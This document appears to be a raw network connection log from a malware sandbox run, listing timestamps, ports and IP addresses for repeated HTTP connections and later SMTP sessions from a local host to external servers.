Jan 10, 2025 16:02:16.461735010 CET	49851	80	192.168.2.4	44.221.84.105
Jan 10, 2025 16:02:16.466532946 CET	80	49851	44.221.84.105	192.168.2.4
Jan 10, 2025 16:02:16.466547012 CET	80	49851	44.221.84.105	192.168.2.4
Jan 10, 2025 16:02:16.923989058 CET	80	49851	44.221.84.105	192.168.2.4
Jan 10, 2025 16:02:16.924145937 CET	80	49851	44.221.84.105	192.168.2.4
Jan 10, 2025 16:02:16.924216986 CET	49851	80	192.168.2.4	44.221.84.105
Jan 10, 2025 16:02:16.924319029 CET	49851	80	192.168.2.4	44.221.84.105
Jan 10, 2025 16:02:16.929281950 CET	80	49851	44.221.84.105	192.168.2.4
Jan 10, 2025 16:02:17.264763117 CET	49857	80	192.168.2.4	18.141.10.107
Jan 10, 2025 16:02:17.269601107 CET	80	49857	18.141.10.107	192.168.2.4
Jan 10, 2025 16:02:17.269685030 CET	49857	80	192.168.2.4	18.141.10.107
Jan 10, 2025 16:02:17.269864082 CET	49857	80	192.168.2.4	18.141.10.107
Jan 10, 2025 16:02:17.269895077 CET	49857	80	192.168.2.4	18.141.10.107
Jan 10, 2025 16:02:17.274719000 CET	80	49857	18.141.10.107	192.168.2.4
Jan 10, 2025 16:02:17.274794102 CET	80	49857	18.141.10.107	192.168.2.4
Jan 10, 2025 16:02:17.720212936 CET	2049	49757	212.162.149.53	192.168.2.4
Jan 10, 2025 16:02:17.720474958 CET	49757	2049	192.168.2.4	212.162.149.53
Jan 10, 2025 16:02:17.720768929 CET	49757	2049	192.168.2.4	212.162.149.53
Jan 10, 2025 16:02:18.715440989 CET	80	49857	18.141.10.107	192.168.2.4
Jan 10, 2025 16:02:18.715468884 CET	80	49857	18.141.10.107	192.168.2.4
Jan 10, 2025 16:02:18.715521097 CET	49857	80	192.168.2.4	18.141.10.107
Jan 10, 2025 16:02:18.715615988 CET	49857	80	192.168.2.4	18.141.10.107
Jan 10, 2025 16:02:18.720345974 CET	80	49857	18.141.10.107	192.168.2.4
Jan 10, 2025 16:02:19.026973009 CET	49869	80	192.168.2.4	18.246.231.120
Jan 10, 2025 16:02:19.031832933 CET	80	49869	18.246.231.120	192.168.2.4
Jan 10, 2025 16:02:19.031946898 CET	49869	80	192.168.2.4	18.246.231.120
Jan 10, 2025 16:02:19.032044888 CET	49869	80	192.168.2.4	18.246.231.120
Jan 10, 2025 16:02:19.032044888 CET	49869	80	192.168.2.4	18.246.231.120
Jan 10, 2025 16:02:19.036834002 CET	80	49869	18.246.231.120	192.168.2.4
Jan 10, 2025 16:02:19.036849022 CET	80	49869	18.246.231.120	192.168.2.4
Jan 10, 2025 16:02:19.782983065 CET	80	49869	18.246.231.120	192.168.2.4
Jan 10, 2025 16:02:19.783144951 CET	49869	80	192.168.2.4	18.246.231.120
Jan 10, 2025 16:02:19.783152103 CET	80	49869	18.246.231.120	192.168.2.4
Jan 10, 2025 16:02:19.783204079 CET	49869	80	192.168.2.4	18.246.231.120
Jan 10, 2025 16:02:19.787909985 CET	80	49869	18.246.231.120	192.168.2.4
Jan 10, 2025 16:02:20.044701099 CET	49878	80	192.168.2.4	34.227.7.138
Jan 10, 2025 16:02:20.049571037 CET	80	49878	34.227.7.138	192.168.2.4
Jan 10, 2025 16:02:20.049673080 CET	49878	80	192.168.2.4	34.227.7.138
Jan 10, 2025 16:02:20.050456047 CET	49878	80	192.168.2.4	34.227.7.138
Jan 10, 2025 16:02:20.050570011 CET	49878	80	192.168.2.4	34.227.7.138
Jan 10, 2025 16:02:20.055299044 CET	80	49878	34.227.7.138	192.168.2.4
Jan 10, 2025 16:02:20.055346966 CET	80	49878	34.227.7.138	192.168.2.4
Jan 10, 2025 16:02:20.523746967 CET	80	49878	34.227.7.138	192.168.2.4
Jan 10, 2025 16:02:20.523890972 CET	80	49878	34.227.7.138	192.168.2.4
Jan 10, 2025 16:02:20.524192095 CET	49878	80	192.168.2.4	34.227.7.138
Jan 10, 2025 16:02:20.524192095 CET	49878	80	192.168.2.4	34.227.7.138
Jan 10, 2025 16:02:20.528983116 CET	80	49878	34.227.7.138	192.168.2.4
Jan 10, 2025 16:02:20.800633907 CET	49884	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:02:20.805459023 CET	80	49884	13.251.16.150	192.168.2.4
Jan 10, 2025 16:02:20.805546999 CET	49884	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:02:20.805680990 CET	49884	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:02:20.805706024 CET	49884	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:02:20.810460091 CET	80	49884	13.251.16.150	192.168.2.4
Jan 10, 2025 16:02:20.810471058 CET	80	49884	13.251.16.150	192.168.2.4
Jan 10, 2025 16:02:22.209798098 CET	80	49884	13.251.16.150	192.168.2.4
Jan 10, 2025 16:02:22.209897995 CET	80	49884	13.251.16.150	192.168.2.4
Jan 10, 2025 16:02:22.209954977 CET	49884	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:02:22.209975958 CET	49884	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:02:22.214728117 CET	80	49884	13.251.16.150	192.168.2.4
Jan 10, 2025 16:02:22.446568966 CET	49895	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:02:22.451463938 CET	80	49895	13.251.16.150	192.168.2.4
Jan 10, 2025 16:02:22.451536894 CET	49895	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:02:22.451761961 CET	49895	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:02:22.451785088 CET	49895	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:02:22.456564903 CET	80	49895	13.251.16.150	192.168.2.4
Jan 10, 2025 16:02:22.456582069 CET	80	49895	13.251.16.150	192.168.2.4
Jan 10, 2025 16:02:22.726788998 CET	49898	2049	192.168.2.4	212.162.149.53
Jan 10, 2025 16:02:22.732647896 CET	2049	49898	212.162.149.53	192.168.2.4
Jan 10, 2025 16:02:22.732831001 CET	49898	2049	192.168.2.4	212.162.149.53
Jan 10, 2025 16:02:22.733187914 CET	49898	2049	192.168.2.4	212.162.149.53
Jan 10, 2025 16:02:22.738172054 CET	2049	49898	212.162.149.53	192.168.2.4
Jan 10, 2025 16:02:23.867443085 CET	80	49895	13.251.16.150	192.168.2.4
Jan 10, 2025 16:02:23.867604971 CET	80	49895	13.251.16.150	192.168.2.4
Jan 10, 2025 16:02:23.867635965 CET	49895	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:02:23.867664099 CET	49895	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:02:23.872499943 CET	80	49895	13.251.16.150	192.168.2.4
Jan 10, 2025 16:02:24.198656082 CET	49909	80	192.168.2.4	18.246.231.120
Jan 10, 2025 16:02:24.203562975 CET	80	49909	18.246.231.120	192.168.2.4
Jan 10, 2025 16:02:24.203664064 CET	49909	80	192.168.2.4	18.246.231.120
Jan 10, 2025 16:02:24.203881979 CET	49909	80	192.168.2.4	18.246.231.120
Jan 10, 2025 16:02:24.203928947 CET	49909	80	192.168.2.4	18.246.231.120
Jan 10, 2025 16:02:24.208622932 CET	80	49909	18.246.231.120	192.168.2.4
Jan 10, 2025 16:02:24.208662033 CET	80	49909	18.246.231.120	192.168.2.4
Jan 10, 2025 16:02:24.922045946 CET	80	49909	18.246.231.120	192.168.2.4
Jan 10, 2025 16:02:24.922235012 CET	80	49909	18.246.231.120	192.168.2.4
Jan 10, 2025 16:02:24.922333002 CET	49909	80	192.168.2.4	18.246.231.120
Jan 10, 2025 16:02:24.922408104 CET	49909	80	192.168.2.4	18.246.231.120
Jan 10, 2025 16:02:24.927253008 CET	80	49909	18.246.231.120	192.168.2.4
Jan 10, 2025 16:02:25.102303982 CET	49915	80	192.168.2.4	47.129.31.212
Jan 10, 2025 16:02:25.107213020 CET	80	49915	47.129.31.212	192.168.2.4
Jan 10, 2025 16:02:25.107305050 CET	49915	80	192.168.2.4	47.129.31.212
Jan 10, 2025 16:02:25.107589960 CET	49915	80	192.168.2.4	47.129.31.212
Jan 10, 2025 16:02:25.107693911 CET	49915	80	192.168.2.4	47.129.31.212
Jan 10, 2025 16:02:25.112395048 CET	80	49915	47.129.31.212	192.168.2.4
Jan 10, 2025 16:02:25.112468004 CET	80	49915	47.129.31.212	192.168.2.4
Jan 10, 2025 16:02:26.474149942 CET	80	49915	47.129.31.212	192.168.2.4
Jan 10, 2025 16:02:26.474270105 CET	80	49915	47.129.31.212	192.168.2.4
Jan 10, 2025 16:02:26.474387884 CET	49915	80	192.168.2.4	47.129.31.212
Jan 10, 2025 16:02:26.474658966 CET	49915	80	192.168.2.4	47.129.31.212
Jan 10, 2025 16:02:26.479448080 CET	80	49915	47.129.31.212	192.168.2.4
Jan 10, 2025 16:02:26.649297953 CET	49926	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:02:26.654324055 CET	80	49926	13.251.16.150	192.168.2.4
Jan 10, 2025 16:02:26.654409885 CET	49926	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:02:26.654550076 CET	49926	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:02:26.654578924 CET	49926	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:02:26.659385920 CET	80	49926	13.251.16.150	192.168.2.4
Jan 10, 2025 16:02:26.659396887 CET	80	49926	13.251.16.150	192.168.2.4
Jan 10, 2025 16:02:28.057442904 CET	80	49926	13.251.16.150	192.168.2.4
Jan 10, 2025 16:02:28.057490110 CET	80	49926	13.251.16.150	192.168.2.4
Jan 10, 2025 16:02:28.057612896 CET	49926	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:02:28.057655096 CET	49926	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:02:28.062473059 CET	80	49926	13.251.16.150	192.168.2.4
Jan 10, 2025 16:02:28.206284046 CET	49937	80	192.168.2.4	18.246.231.120
Jan 10, 2025 16:02:28.211118937 CET	80	49937	18.246.231.120	192.168.2.4
Jan 10, 2025 16:02:28.211198092 CET	49937	80	192.168.2.4	18.246.231.120
Jan 10, 2025 16:02:28.211441994 CET	49937	80	192.168.2.4	18.246.231.120
Jan 10, 2025 16:02:28.211474895 CET	49937	80	192.168.2.4	18.246.231.120
Jan 10, 2025 16:02:28.216233015 CET	80	49937	18.246.231.120	192.168.2.4
Jan 10, 2025 16:02:28.216250896 CET	80	49937	18.246.231.120	192.168.2.4
Jan 10, 2025 16:02:28.930337906 CET	80	49937	18.246.231.120	192.168.2.4
Jan 10, 2025 16:02:28.930479050 CET	80	49937	18.246.231.120	192.168.2.4
Jan 10, 2025 16:02:28.930582047 CET	49937	80	192.168.2.4	18.246.231.120
Jan 10, 2025 16:02:28.933403015 CET	49937	80	192.168.2.4	18.246.231.120
Jan 10, 2025 16:02:28.938210964 CET	80	49937	18.246.231.120	192.168.2.4
Jan 10, 2025 16:02:29.588217974 CET	49948	80	192.168.2.4	3.94.10.34
Jan 10, 2025 16:02:29.593091965 CET	80	49948	3.94.10.34	192.168.2.4
Jan 10, 2025 16:02:29.593255997 CET	49948	80	192.168.2.4	3.94.10.34
Jan 10, 2025 16:02:29.595441103 CET	49948	80	192.168.2.4	3.94.10.34
Jan 10, 2025 16:02:29.595441103 CET	49948	80	192.168.2.4	3.94.10.34
Jan 10, 2025 16:02:29.600219965 CET	80	49948	3.94.10.34	192.168.2.4
Jan 10, 2025 16:02:29.600229979 CET	80	49948	3.94.10.34	192.168.2.4
Jan 10, 2025 16:02:30.063750982 CET	80	49948	3.94.10.34	192.168.2.4
Jan 10, 2025 16:02:30.063767910 CET	80	49948	3.94.10.34	192.168.2.4
Jan 10, 2025 16:02:30.063826084 CET	49948	80	192.168.2.4	3.94.10.34
Jan 10, 2025 16:02:30.063932896 CET	49948	80	192.168.2.4	3.94.10.34
Jan 10, 2025 16:02:30.068742990 CET	80	49948	3.94.10.34	192.168.2.4
Jan 10, 2025 16:02:30.351495028 CET	49954	80	192.168.2.4	18.246.231.120
Jan 10, 2025 16:02:30.356266975 CET	80	49954	18.246.231.120	192.168.2.4
Jan 10, 2025 16:02:30.356360912 CET	49954	80	192.168.2.4	18.246.231.120
Jan 10, 2025 16:02:30.356518030 CET	49954	80	192.168.2.4	18.246.231.120
Jan 10, 2025 16:02:30.356518030 CET	49954	80	192.168.2.4	18.246.231.120
Jan 10, 2025 16:02:30.361323118 CET	80	49954	18.246.231.120	192.168.2.4
Jan 10, 2025 16:02:30.361335039 CET	80	49954	18.246.231.120	192.168.2.4
Jan 10, 2025 16:02:31.094607115 CET	80	49954	18.246.231.120	192.168.2.4
Jan 10, 2025 16:02:31.094980955 CET	80	49954	18.246.231.120	192.168.2.4
Jan 10, 2025 16:02:31.095062017 CET	49954	80	192.168.2.4	18.246.231.120
Jan 10, 2025 16:02:31.175519943 CET	49954	80	192.168.2.4	18.246.231.120
Jan 10, 2025 16:02:31.180411100 CET	80	49954	18.246.231.120	192.168.2.4
Jan 10, 2025 16:02:32.218087912 CET	49963	80	192.168.2.4	3.254.94.185
Jan 10, 2025 16:02:32.222961903 CET	80	49963	3.254.94.185	192.168.2.4
Jan 10, 2025 16:02:32.223048925 CET	49963	80	192.168.2.4	3.254.94.185
Jan 10, 2025 16:02:32.223448992 CET	49963	80	192.168.2.4	3.254.94.185
Jan 10, 2025 16:02:32.223496914 CET	49963	80	192.168.2.4	3.254.94.185
Jan 10, 2025 16:02:32.228244066 CET	80	49963	3.254.94.185	192.168.2.4
Jan 10, 2025 16:02:32.228260040 CET	80	49963	3.254.94.185	192.168.2.4
Jan 10, 2025 16:02:32.979969978 CET	80	49963	3.254.94.185	192.168.2.4
Jan 10, 2025 16:02:32.980074883 CET	80	49963	3.254.94.185	192.168.2.4
Jan 10, 2025 16:02:32.980132103 CET	49963	80	192.168.2.4	3.254.94.185
Jan 10, 2025 16:02:32.980191946 CET	49963	80	192.168.2.4	3.254.94.185
Jan 10, 2025 16:02:32.985038042 CET	80	49963	3.254.94.185	192.168.2.4
Jan 10, 2025 16:02:33.030780077 CET	49968	80	192.168.2.4	85.214.228.140
Jan 10, 2025 16:02:33.035543919 CET	80	49968	85.214.228.140	192.168.2.4
Jan 10, 2025 16:02:33.035617113 CET	49968	80	192.168.2.4	85.214.228.140
Jan 10, 2025 16:02:33.035773993 CET	49968	80	192.168.2.4	85.214.228.140
Jan 10, 2025 16:02:33.035773993 CET	49968	80	192.168.2.4	85.214.228.140
Jan 10, 2025 16:02:33.040529966 CET	80	49968	85.214.228.140	192.168.2.4
Jan 10, 2025 16:02:33.040540934 CET	80	49968	85.214.228.140	192.168.2.4
Jan 10, 2025 16:02:33.665944099 CET	80	49968	85.214.228.140	192.168.2.4
Jan 10, 2025 16:02:33.697830915 CET	49968	80	192.168.2.4	85.214.228.140
Jan 10, 2025 16:02:33.698009014 CET	49968	80	192.168.2.4	85.214.228.140
Jan 10, 2025 16:02:33.702665091 CET	80	49968	85.214.228.140	192.168.2.4
Jan 10, 2025 16:02:33.702755928 CET	80	49968	85.214.228.140	192.168.2.4
Jan 10, 2025 16:02:33.891940117 CET	80	49968	85.214.228.140	192.168.2.4
Jan 10, 2025 16:02:33.934420109 CET	49973	80	192.168.2.4	47.129.31.212
Jan 10, 2025 16:02:33.939327955 CET	80	49973	47.129.31.212	192.168.2.4
Jan 10, 2025 16:02:33.939409018 CET	49973	80	192.168.2.4	47.129.31.212
Jan 10, 2025 16:02:33.939579964 CET	49973	80	192.168.2.4	47.129.31.212
Jan 10, 2025 16:02:33.939599991 CET	49973	80	192.168.2.4	47.129.31.212
Jan 10, 2025 16:02:33.943032980 CET	49968	80	192.168.2.4	85.214.228.140
Jan 10, 2025 16:02:33.944360971 CET	80	49973	47.129.31.212	192.168.2.4
Jan 10, 2025 16:02:33.944372892 CET	80	49973	47.129.31.212	192.168.2.4
Jan 10, 2025 16:02:35.232158899 CET	49973	80	192.168.2.4	47.129.31.212
Jan 10, 2025 16:02:35.288932085 CET	49979	80	192.168.2.4	47.129.31.212
Jan 10, 2025 16:02:35.293751955 CET	80	49979	47.129.31.212	192.168.2.4
Jan 10, 2025 16:02:35.293808937 CET	49979	80	192.168.2.4	47.129.31.212
Jan 10, 2025 16:02:35.294368029 CET	49979	80	192.168.2.4	47.129.31.212
Jan 10, 2025 16:02:35.294368029 CET	49979	80	192.168.2.4	47.129.31.212
Jan 10, 2025 16:02:35.299156904 CET	80	49979	47.129.31.212	192.168.2.4
Jan 10, 2025 16:02:35.299169064 CET	80	49979	47.129.31.212	192.168.2.4
Jan 10, 2025 16:02:36.713551044 CET	80	49979	47.129.31.212	192.168.2.4
Jan 10, 2025 16:02:36.713574886 CET	80	49979	47.129.31.212	192.168.2.4
Jan 10, 2025 16:02:36.714054108 CET	49979	80	192.168.2.4	47.129.31.212
Jan 10, 2025 16:02:36.721064091 CET	49979	80	192.168.2.4	47.129.31.212
Jan 10, 2025 16:02:36.725812912 CET	80	49979	47.129.31.212	192.168.2.4
Jan 10, 2025 16:02:36.763973951 CET	49990	80	192.168.2.4	18.246.231.120
Jan 10, 2025 16:02:36.768773079 CET	80	49990	18.246.231.120	192.168.2.4
Jan 10, 2025 16:02:36.768873930 CET	49990	80	192.168.2.4	18.246.231.120
Jan 10, 2025 16:02:36.773049116 CET	49990	80	192.168.2.4	18.246.231.120
Jan 10, 2025 16:02:36.773099899 CET	49990	80	192.168.2.4	18.246.231.120
Jan 10, 2025 16:02:36.777905941 CET	80	49990	18.246.231.120	192.168.2.4
Jan 10, 2025 16:02:36.777918100 CET	80	49990	18.246.231.120	192.168.2.4
Jan 10, 2025 16:02:37.499875069 CET	80	49990	18.246.231.120	192.168.2.4
Jan 10, 2025 16:02:37.500034094 CET	80	49990	18.246.231.120	192.168.2.4
Jan 10, 2025 16:02:37.500123978 CET	49990	80	192.168.2.4	18.246.231.120
Jan 10, 2025 16:02:37.500123978 CET	49990	80	192.168.2.4	18.246.231.120
Jan 10, 2025 16:02:37.505048990 CET	80	49990	18.246.231.120	192.168.2.4
Jan 10, 2025 16:02:37.541632891 CET	49996	80	192.168.2.4	47.129.31.212
Jan 10, 2025 16:02:37.546689034 CET	80	49996	47.129.31.212	192.168.2.4
Jan 10, 2025 16:02:37.546786070 CET	49996	80	192.168.2.4	47.129.31.212
Jan 10, 2025 16:02:37.546943903 CET	49996	80	192.168.2.4	47.129.31.212
Jan 10, 2025 16:02:37.546972990 CET	49996	80	192.168.2.4	47.129.31.212
Jan 10, 2025 16:02:37.551843882 CET	80	49996	47.129.31.212	192.168.2.4
Jan 10, 2025 16:02:37.551883936 CET	80	49996	47.129.31.212	192.168.2.4
Jan 10, 2025 16:02:38.914217949 CET	80	49996	47.129.31.212	192.168.2.4
Jan 10, 2025 16:02:38.914407969 CET	49996	80	192.168.2.4	47.129.31.212
Jan 10, 2025 16:02:38.914447069 CET	80	49996	47.129.31.212	192.168.2.4
Jan 10, 2025 16:02:38.914511919 CET	49996	80	192.168.2.4	47.129.31.212
Jan 10, 2025 16:02:38.919233084 CET	80	49996	47.129.31.212	192.168.2.4
Jan 10, 2025 16:02:38.956455946 CET	50007	80	192.168.2.4	34.227.7.138
Jan 10, 2025 16:02:38.961283922 CET	80	50007	34.227.7.138	192.168.2.4
Jan 10, 2025 16:02:38.961360931 CET	50007	80	192.168.2.4	34.227.7.138
Jan 10, 2025 16:02:38.961498022 CET	50007	80	192.168.2.4	34.227.7.138
Jan 10, 2025 16:02:38.961519003 CET	50007	80	192.168.2.4	34.227.7.138
Jan 10, 2025 16:02:38.966284990 CET	80	50007	34.227.7.138	192.168.2.4
Jan 10, 2025 16:02:38.966300964 CET	80	50007	34.227.7.138	192.168.2.4
Jan 10, 2025 16:02:39.131093979 CET	50007	80	192.168.2.4	34.227.7.138
Jan 10, 2025 16:02:39.173141956 CET	50010	80	192.168.2.4	34.227.7.138
Jan 10, 2025 16:02:39.177944899 CET	80	50010	34.227.7.138	192.168.2.4
Jan 10, 2025 16:02:39.178073883 CET	50010	80	192.168.2.4	34.227.7.138
Jan 10, 2025 16:02:39.178652048 CET	50010	80	192.168.2.4	34.227.7.138
Jan 10, 2025 16:02:39.178652048 CET	50010	80	192.168.2.4	34.227.7.138
Jan 10, 2025 16:02:39.183504105 CET	80	50010	34.227.7.138	192.168.2.4
Jan 10, 2025 16:02:39.183518887 CET	80	50010	34.227.7.138	192.168.2.4
Jan 10, 2025 16:02:39.639908075 CET	80	50010	34.227.7.138	192.168.2.4
Jan 10, 2025 16:02:39.640091896 CET	80	50010	34.227.7.138	192.168.2.4
Jan 10, 2025 16:02:39.640151978 CET	50010	80	192.168.2.4	34.227.7.138
Jan 10, 2025 16:02:39.640151978 CET	50010	80	192.168.2.4	34.227.7.138
Jan 10, 2025 16:02:39.645035028 CET	80	50010	34.227.7.138	192.168.2.4
Jan 10, 2025 16:02:39.693562031 CET	50014	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:02:39.698471069 CET	80	50014	13.251.16.150	192.168.2.4
Jan 10, 2025 16:02:39.698546886 CET	50014	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:02:39.698704004 CET	50014	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:02:39.698750019 CET	50014	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:02:39.703656912 CET	80	50014	13.251.16.150	192.168.2.4
Jan 10, 2025 16:02:39.703670979 CET	80	50014	13.251.16.150	192.168.2.4
Jan 10, 2025 16:02:41.136997938 CET	80	50014	13.251.16.150	192.168.2.4
Jan 10, 2025 16:02:41.137077093 CET	80	50014	13.251.16.150	192.168.2.4
Jan 10, 2025 16:02:41.137152910 CET	50014	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:02:41.137181044 CET	50014	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:02:41.142026901 CET	80	50014	13.251.16.150	192.168.2.4
Jan 10, 2025 16:02:41.196113110 CET	50024	80	192.168.2.4	34.246.200.160
Jan 10, 2025 16:02:41.200999022 CET	80	50024	34.246.200.160	192.168.2.4
Jan 10, 2025 16:02:41.201064110 CET	50024	80	192.168.2.4	34.246.200.160
Jan 10, 2025 16:02:41.201493979 CET	50024	80	192.168.2.4	34.246.200.160
Jan 10, 2025 16:02:41.201493979 CET	50024	80	192.168.2.4	34.246.200.160
Jan 10, 2025 16:02:41.206331968 CET	80	50024	34.246.200.160	192.168.2.4
Jan 10, 2025 16:02:41.206350088 CET	80	50024	34.246.200.160	192.168.2.4
Jan 10, 2025 16:02:41.936881065 CET	80	50024	34.246.200.160	192.168.2.4
Jan 10, 2025 16:02:41.936979055 CET	80	50024	34.246.200.160	192.168.2.4
Jan 10, 2025 16:02:41.937145948 CET	50024	80	192.168.2.4	34.246.200.160
Jan 10, 2025 16:02:41.937145948 CET	50024	80	192.168.2.4	34.246.200.160
Jan 10, 2025 16:02:41.941966057 CET	80	50024	34.246.200.160	192.168.2.4
Jan 10, 2025 16:02:41.982799053 CET	50030	80	192.168.2.4	18.141.10.107
Jan 10, 2025 16:02:41.987644911 CET	80	50030	18.141.10.107	192.168.2.4
Jan 10, 2025 16:02:41.987725973 CET	50030	80	192.168.2.4	18.141.10.107
Jan 10, 2025 16:02:41.987864971 CET	50030	80	192.168.2.4	18.141.10.107
Jan 10, 2025 16:02:41.987900972 CET	50030	80	192.168.2.4	18.141.10.107
Jan 10, 2025 16:02:41.992609978 CET	80	50030	18.141.10.107	192.168.2.4
Jan 10, 2025 16:02:41.992638111 CET	80	50030	18.141.10.107	192.168.2.4
Jan 10, 2025 16:02:43.131778955 CET	50030	80	192.168.2.4	18.141.10.107
Jan 10, 2025 16:02:43.421279907 CET	50041	80	192.168.2.4	18.141.10.107
Jan 10, 2025 16:02:43.426525116 CET	80	50041	18.141.10.107	192.168.2.4
Jan 10, 2025 16:02:43.426645041 CET	50041	80	192.168.2.4	18.141.10.107
Jan 10, 2025 16:02:43.426784039 CET	50041	80	192.168.2.4	18.141.10.107
Jan 10, 2025 16:02:43.426806927 CET	50041	80	192.168.2.4	18.141.10.107
Jan 10, 2025 16:02:43.431528091 CET	80	50041	18.141.10.107	192.168.2.4
Jan 10, 2025 16:02:43.431550980 CET	80	50041	18.141.10.107	192.168.2.4
Jan 10, 2025 16:02:43.892138004 CET	80	49968	85.214.228.140	192.168.2.4
Jan 10, 2025 16:02:43.892263889 CET	49968	80	192.168.2.4	85.214.228.140
Jan 10, 2025 16:02:43.892385006 CET	49968	80	192.168.2.4	85.214.228.140
Jan 10, 2025 16:02:43.897145987 CET	80	49968	85.214.228.140	192.168.2.4
Jan 10, 2025 16:02:44.109034061 CET	2049	49898	212.162.149.53	192.168.2.4
Jan 10, 2025 16:02:44.109122038 CET	49898	2049	192.168.2.4	212.162.149.53
Jan 10, 2025 16:02:44.109406948 CET	49898	2049	192.168.2.4	212.162.149.53
Jan 10, 2025 16:02:44.799875975 CET	80	50041	18.141.10.107	192.168.2.4
Jan 10, 2025 16:02:44.800004959 CET	80	50041	18.141.10.107	192.168.2.4
Jan 10, 2025 16:02:44.800074100 CET	50041	80	192.168.2.4	18.141.10.107
Jan 10, 2025 16:02:44.800158024 CET	50041	80	192.168.2.4	18.141.10.107
Jan 10, 2025 16:02:44.804966927 CET	80	50041	18.141.10.107	192.168.2.4
Jan 10, 2025 16:02:45.129884005 CET	50052	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:02:45.134643078 CET	80	50052	13.251.16.150	192.168.2.4
Jan 10, 2025 16:02:45.134716988 CET	50052	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:02:45.134891033 CET	50052	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:02:45.135338068 CET	50052	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:02:45.139612913 CET	80	50052	13.251.16.150	192.168.2.4
Jan 10, 2025 16:02:45.140085936 CET	80	50052	13.251.16.150	192.168.2.4
Jan 10, 2025 16:02:49.128181934 CET	50067	2049	192.168.2.4	212.162.149.53
Jan 10, 2025 16:02:49.133049965 CET	2049	50067	212.162.149.53	192.168.2.4
Jan 10, 2025 16:02:49.133627892 CET	50067	2049	192.168.2.4	212.162.149.53
Jan 10, 2025 16:02:49.137501955 CET	50067	2049	192.168.2.4	212.162.149.53
Jan 10, 2025 16:02:49.142642021 CET	2049	50067	212.162.149.53	192.168.2.4
Jan 10, 2025 16:03:04.788639069 CET	80	49758	72.52.178.23	192.168.2.4
Jan 10, 2025 16:03:04.788702965 CET	49758	80	192.168.2.4	72.52.178.23
Jan 10, 2025 16:03:04.811577082 CET	49758	80	192.168.2.4	72.52.178.23
Jan 10, 2025 16:03:04.816427946 CET	80	49758	72.52.178.23	192.168.2.4
Jan 10, 2025 16:03:06.285852909 CET	50068	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:06.290735960 CET	587	50068	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:06.292288065 CET	50068	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:06.959597111 CET	587	50068	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:06.960024118 CET	50068	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:06.964847088 CET	587	50068	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:07.177418947 CET	587	50068	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:07.177617073 CET	50068	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:07.182382107 CET	587	50068	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:07.362353086 CET	587	50068	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:07.362821102 CET	50068	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:07.370333910 CET	587	50068	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:07.543340921 CET	50068	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:07.549354076 CET	587	50068	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:07.550306082 CET	50068	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:07.594738960 CET	50069	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:07.599674940 CET	587	50069	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:07.602958918 CET	50069	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:08.400935888 CET	587	50069	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:08.404095888 CET	50069	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:08.408888102 CET	587	50069	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:08.593907118 CET	587	50069	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:08.594217062 CET	50069	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:08.599097013 CET	587	50069	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:08.785039902 CET	587	50069	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:08.785826921 CET	50069	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:08.791363001 CET	587	50069	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:08.981822968 CET	587	50069	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:08.981842041 CET	587	50069	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:08.981862068 CET	587	50069	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:08.981900930 CET	50069	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:08.984957933 CET	50069	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:08.989821911 CET	587	50069	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:09.175084114 CET	587	50069	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:09.179326057 CET	50069	587	192.168.2.4	51.195.88.199
